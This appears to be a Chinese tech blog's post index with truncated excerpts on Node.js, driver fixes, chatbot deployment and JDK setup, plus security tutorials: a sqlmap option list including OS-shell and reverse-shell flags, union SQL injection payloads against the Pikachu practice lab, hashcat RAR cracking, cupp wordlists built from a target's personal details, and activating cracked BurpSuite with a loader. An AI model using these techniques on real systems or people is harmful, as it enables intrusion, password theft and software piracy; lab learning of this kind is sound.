HAHA

安装nvm 官方有安装方法，地址为： https://nvm.p6p.net/install/linux.html 123curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.2/install.sh | bashsource ~/.bashrcnvm --version 安装nodejs 官方同样有方法，地址为： https://nodejs.cn/en/download 二进制源码地址为： https://nodejs.cn/en/download 1234curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.2/install.sh | bash\. "$HOME/.nvm/nvm.sh"nvm install 18node -v 报错问题解决 依赖版本过低 更新gcc 1234567891011121314yum -y install centos-release-sclyum -y install devtoo ...

问题现象 这次遇到的问题现象是一开始网卡会时不时异常，通过重启和去除静电的方法会恢复正常，但是突然有一天就开始无法恢复了，始终保持异常的状态，怎么重新安装驱动都没用。 但是主机是一直有识别到网卡的，设备管理显示黄色告警。 解决办法 拆机拔插网卡 网卡拆下来用纸巾擦干净，或者酒精，重新安装即恢复 原本是一直用手机usb共享网络使用网络了，但是有一天突然想到小时候的小霸王游戏卡都是擦擦金手指解决的， 尝试后没想到真有用 这个是我这次的问题解决办法，正常解决途径有以下方法 去除静电 拔掉电脑上所有的线 启动键一直按，按到关机后再按20秒 操作成功后启动我的联想y7000键盘灯会是熄灭的 更新/重新下载网卡驱动 使用intel网卡驱动自动检测下载工具 下载地址： https://www.intel.cn/content/www/cn/zh/download/19351/intel-wireless-wi-fi-drivers-for-windows-10-and-windows-11.html 其他驱动： https://www.intel.cn/content/www/cn/z ...

astrbot 一个易于上手的多平台聊天机器人及开发框架，官方已经有详细的部署步骤，只写一下我规避遇到的问题的部署方法 官网：https://astrbot.app/what-is-astrbot.html ai接入微信 docker部署 astrbot部署 拉取项目 12git clone https://github.com/Soulter/AstrBotcd AstrBot 运行compose 1sudo docker compose up -d 配置 Gewechat 适配器时跟着官方方法配置即可，host其实只要网络通即可，11451端口已经映射宿主机，所以直接写宿主机ip即可 部署 Gewechat 拉取镜像 12docker pull registry.cn-hangzhou.aliyuncs.com/gewe/gewe:latestdocker tag registry.cn-hangzhou.aliyuncs.com/gewe/gewe gewe 启动 12mkdir gewechatdocker run -itd -v ./gewechat: ...

应用场景 自动测试注入已找到的sql注入漏洞点 命令参数 常用参数 参数 详解 -u “url” 注入的url –data post请求payload –cookie cookie注入 –dbs 列出所有数据库 -tables 列出所有表 -D 指定数据库 -T 指定表 -C 指定字段 –dump 跟在上面指定的参数一起使用，列出指定的数据 –sql-shell 写shell –batch 默认选择y –eta 盲注，显示时间和优化 –os-cmd=id 执行系统命令 –os-shell 系统交互shell –os-pwn 反弹shell –referer 使用referer欺骗 –users 列数据库所有用户 –threads 多线程 –file-read 读指定文件 –file-write 写入指定文件 示例 post请求插入请求表单 1sqlmap -u "url" --data="id=1&" --batch 列出数据库系统用 ...

数字型注入 使用burp suite工具攻击 如果想要去除干扰信息，后面的id=1可以改成非法id=-2 获取当前数据库名称和版本 抓包修改参数 1id=1 union select database(),version()&submit=%E6%9F%A5%E8%AF%A2 可以得出结果 1234567select your userid?hello,vinceyour email is: vince@pikachu.comhello,pikachuyour email is: 5.7.26-0ubuntu0.18.04.1-log 获取该数据库表名 修改参数 1id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'&submit=%E6%9F%A5%E8%AF%A2 结果 1234567select your userid?hello,vinceyour email is: v ...

hashcat下载 windows需要下载两个工具，一个hashcat，一个John the Ripper，下面是下载地址： hashcat https://hashcat.net/hashcat/ John the Ripper https://www.openwall.com/john/ hashcat使用 获取hash值 通过John the Ripper工具获取hash 1rar2john.exe <文件名> 通过windows命令获取md5值 1certutil -hashfile <文件> MD5 参数 -m 选择hash模式，通过hash值计算，可以通过命令自动运算 1hashcat <hash值> -a 选择攻击模式 |参数|含义| |:-:|:—| |-a 0|字典破解| |-a 1|多字典组合破解| |-a 3|掩码破解| |-a 6|字典+掩码破解| |-a 7|掩码+字典破解| 限制密码长度范围爆破 rar hash值爆破 1hashcat -m 13000 -a 3 <hash值> ?a? ...

U盘工具 rufus 下载地址： https://rufus.ie/zh/ 解压 7zip 下载地址： https://www.7-zip.org/ ssh远程工具 mobaxterm 下载地址： https://mobaxterm.mobatek.net/download.html ps手柄驱动 ds4-windows windows使用ps手柄，会和steam手柄识别冲突 下载地址： https://ds4-windows.com/download/ryochan7-ds4windows/ 远程同屏游戏 Parsec 下载地址： https://parsec.app/downloads 文件检索 everything 下载地址： https://www.voidtools.com/zh-cn/downloads/ 控制手机 anlink 下载地址：（或者windows商店） https://cn.anlinksoft.com/ ftp universal ftp server 下载地址： windows应用商店 壁纸主题 小红车 下 ...

前言 kali有很多字典生成工具，这里主要说cupp这个工具，他是一款社交工程学字典生成工具，可以根据目标用户的个人信息生成定制的密码字典， cupp 使用方法 输入命令根据提示输入提示词即可 1cupp -i 翻译 12345678910111213141516171819202122232425262728293031323334> First Name: 名字：目标的名字> Surname: 姓：目标的姓氏> Nickname: 昵称：目标的常用昵称或别名> Birthdate (DDMMYYYY): 出生日期：目标的出生日期，格式为日月年（DDMMYYYY）> Partners) name:伴侣的名字> Partners) nickname:伴侣的昵称：> Partners) birthdate (DDMMYYYY):伴侣的出生日期（DDMMYYYY）> Child's name:孩子的名字：> Child's nickname:孩子的昵称：> Child's birthdate (DDM ...

下载jdk 更新 12sudo apt updatesudo apt upgrade 下载 默认jdk 1sudo apt install default-jdk 指定版本 1sudo apt install openjdk-17-jdk 切换版本 如果安装了多个java版本，查看的命令是 1update-alternatives --list java 切换的命令是 1update-alternatives --config java 根据需要填写编号即可。 卸载 查看已有版本 1dpkg --list | grep -i "jdk\|jre\|java" 卸载命令 卸载 1sudo apt purge openjdk-11-jdk openjdk-11-jre 删除多余残余设置 12sudo apt autoremovesudo apt clean

前言 来自Datch的使用方法 https://www.52pojie.cn/thread-1544866-1-1.html 下载地址也在上面大佬教程； 这里简单记录下工具的使用方法。 kali激活burpsuite jdk切换 如果后续运行脚本报错，大概率是java的版本问题，21的版本可以使用，可以通过下面这个文章切换版本 java安装和版本切换方法 上传解压包 上传BurpSuite V2025.1.zip到自定义目录运行命令解压 1unzip BurpSuite\ V2025.1.zip 执行激活程序 首页的Start.VBS是windows的执行程序，此处不同系统使用不同后缀程序，后面激活步骤相同 找到linux执行程序目录 12cd BurpSuite\ V2025.1/Linux/ 赋予执行权限 123chmod +x Start.shchmod +x CN_Burp.shchmod +x EN_Burp.sh 执行程序 执行完成后等待页面 1./Start.sh 激活配置 勾选loader和汉化，点击run，软件就会启动 取消提交有关bu ...